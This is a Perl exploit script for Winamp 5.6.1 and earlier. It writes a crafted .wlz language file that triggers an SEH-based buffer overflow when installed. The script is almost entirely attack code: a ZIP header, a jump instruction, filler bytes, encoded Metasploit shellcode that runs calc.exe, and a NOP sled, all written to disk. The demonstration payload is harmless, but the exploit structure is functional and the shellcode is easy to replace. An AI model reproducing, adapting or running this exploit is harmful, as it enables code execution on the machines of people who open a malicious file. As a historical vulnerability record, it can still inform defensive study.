#!/usr/bin/perl

# ---------
# Winamp <=5.6.1 Install Language SEH Exploit
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com>
# special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
# ---------
# In Winamp 5.6.1 Install New Language with (.wlz) file
# and In File (.wlz) can Inclusion SEH for Installing ...
my $header = 
"\x50\x4b\x03\x04\x14\x00\x00\x00\x00\x00\x2f\x92\x7b\x3d\xd3\x55".
"\x30\x92\x00\x28\x00\x00\x00\x28\x00\x00\x08\x00\x00\x00\x61\x75".
"\x74\x68\x2e\x6c\x6e\x67";
my $jump = "\xeb\x06\x90\x90" ; # short jump
my $junk = "\x41" x 321; # Buffer
my $nops = "\x90" x 51; # Nopsled
# windows/exec - 224 bytes (http://www.metasploit.com)
# EXITFUNC=seh, CMD=calc.exe , Encoder: x86/call4_dword_xor
my $shell = 
"\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\x26\x7e\x29\x35\x83\xee\xfc\xe2\xf4\xda\x96\xa0\x35" .
"\x26\x7e\x49\xbc\xc3\x4f\xfb\x51\xad\x2c\x19\xbe\x74\x72" .
"\xa2\x67\x32\xf5\x5b\x1d\x29\xc9\x63\x13\x17\x81\x18\xf5" .
"\x8a\x42\x48\x49\x24\x52\x09\xf4\xe9\x73\x28\xf2\xc4\x8e" .
"\x7b\x62\xad\x2c\x39\xbe\x64\x42\x28\xe5\xad\x3e\x51\xb0" .
"\xe6\x0a\x63\x34\xf6\x2e\xa2\x7d\x3e\xf5\x71\x15\x27\xad" .
"\xca\x09\x6f\xf5\x1d\xbe\x27\xa8\x18\xca\x17\xbe\x85\xf4" .
"\xe9\x73\x28\xf2\x1e\x9e\x5c\xc1\x25\x03\xd1\x0e\x5b\x5a" .
"\x5c\xd7\x7e\xf5\x71\x11\x27\xad\x4f\xbe\x2a\x35\xa2\x6d" .
"\x3a\x7f\xfa\xbe\x22\xf5\x28\xe5\xaf\x3a\x0d\x11\x7d\x25" .
"\x48\x6c\x7c\x2f\xd6\xd5\x7e\x21\x73\xbe\x34\x95\xaf\x68" .
"\x4c\x7f\xa4\xb0\x9f\x7e\x29\x35\x76\x16\x18\xbe\x49\xf9" .
"\xd6\xe0\x9d\x80\x27\x07\xcc\x16\x8f\xa0\x9b\xe3\xd6\xe0" .
"\x1a\x78\x55\x3f\xa6\x85\xc9\x40\x23\xc5\x6e\x26\x54\x11" .
"\x43\x35\x75\x81\xfc\x56\x47\x12\x4a\x1b\x43\x06\x4c\x35";
my $exploit = $header.$jump.$junk.$jump.$shell.$nops; 
open(myfile,'>>ar-dz.wlz');
print myfile $exploit;
close (myfile);
# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans